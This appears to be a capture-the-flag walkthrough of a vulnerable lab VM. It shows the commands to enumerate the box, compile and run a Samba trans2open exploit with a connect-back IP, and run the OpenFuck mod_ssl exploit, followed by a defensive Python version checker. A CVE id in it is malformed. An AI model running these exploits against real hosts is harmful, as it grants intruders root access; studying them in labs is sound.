For the attacking machine, I will be using Kali 2017.1. Once booted, this is what the victim machine will look like:

We start by finding the IP of the victim machine with the netdiscover command:
$ netdiscover

Now that we know our target IP, let’s start by scanning the ports and try to get more information about it:

The scan shows us that the following ports are open:

Port 22 – Running OpenSSH
Port 80 – Running Apache web server
Port 111 – Running RPC
Port 139 – Running Samba
Port 443 – Running Apache web server over SSL
Port 1024 – Running RPC

Upon visiting the web application (on port 80 via http:// and port 443 via https://) we just see a default Test Page:

I did not find anything interesting in the page source either. Going back to the services that are running, Samba is the one that interests me, so I run an enumeration on it:
$ enum4linux -a 172.16.92.138 > output.txt

This gives us a lot of information, including the Samba version in use: 2.2.1a. A quick search shows that a remote code execution exploit is available:
$ searchsploit samba 2.2

I copy the exploit to the root directory as exploit.c:
$ cp /usr/share/exploitdb/platforms/linux/remote/10.c exploit.c
Then I compile the exploit with gcc:
$ gcc -o samba exploit.c
and give the resulting binary execute permissions:
$ chmod 755 samba
Let's dry-run the exploit to see which parameters it requires:

Okay then, I think we are ready to use this:
$ ./samba -b 0 -c 172.16.92.133 172.16.92.138

And we are in with root privileges! Now we need to find the email. I found the email under /var/mail:

While playing around with it more, I found that the machine could also be exploited via Metasploit (CVE-2003-201):
$ use exploit/linux/samba/trans2open

Another way into the machine was via a mod_ssl exploit (CVE-2002-0082). I found its exploit at https://www.exploit-db.com/exploits/764/
$ gcc -o OpenFuck 746.c -lcrypto
Note: since the exploit is old, you can update it by following this tutorial: http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/. Also keep in mind that you will need libssl and libssl-dev installed before compiling the exploit.

Let's exploit!
$ ./OpenFuck 0x6b 172.16.92.138 443 -c 40
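Both ways into this box come down to service versions that were patched years ago, so here is an added example (my own code, not part of the original write-up) of the inventory check a defender would run over nmap-style service banners: it flags Samba builds older than 2.2.8a (the trans2open fix) and mod_ssl builds older than 2.8.7 (the CVE-2002-0082 fix). The banner lines and the fixed-in thresholds are my assumptions, constructed to mirror this box; the page itself only reports the Samba version, not the mod_ssl one.

```python
import re

# Constructed nmap-style service lines modelled on this box (not the page's
# real scan output; the mod_ssl/OpenSSL versions are an assumption).
SCAN_OUTPUT = """\
22/tcp   open  ssh          OpenSSH 2.9p2 (protocol 1.99)
80/tcp   open  http         Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
139/tcp  open  netbios-ssn  Samba smbd 2.2.1a
443/tcp  open  ssl/http     Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
"""

# First version carrying each fix (assumption taken from the vendor advisories):
# Samba 2.2.8a for trans2open, mod_ssl 2.8.7 for CVE-2002-0082.
FIXED_IN = {
    "samba":   ((2, 2, 8, "a"), "trans2open overflow (exploit/linux/samba/trans2open)"),
    "mod_ssl": ((2, 8, 7, ""),  "CVE-2002-0082 session-cache overflow (OpenFuck)"),
}


def parse_version(text):
    """'2.2.1a' -> (2, 2, 1, 'a'). The letter suffix sorts after the bare
    number, so 2.2.8 < 2.2.8a, matching how Samba numbered the fix release."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)([a-z]?)", text)
    return tuple(int(x) for x in m.group(1, 2, 3)) + (m.group(4),)


def find_vulnerable_services(scan_text):
    """Return (port, product, version, issue) for every banner whose version
    is older than the fixed-in version listed in FIXED_IN."""
    findings = []
    for line in scan_text.splitlines():
        if not line[:1].isdigit():
            continue  # skip headers and blank lines
        port = int(line.split("/", 1)[0])
        for product, (fixed, issue) in FIXED_IN.items():
            # Banner shapes handled: "Samba smbd 2.2.1a" and "mod_ssl/2.8.4".
            m = re.search(product + r"[ /](?:smbd )?(\d+\.\d+\.\d+[a-z]?)", line, re.I)
            if m is None:
                continue
            if parse_version(m.group(1)) < fixed:
                findings.append((port, product, m.group(1), issue))
    return findings


if __name__ == "__main__":
    for port, product, version, issue in find_vulnerable_services(SCAN_OUTPUT):
        print(f"port {port}: {product} {version} predates the fix -> {issue}")
```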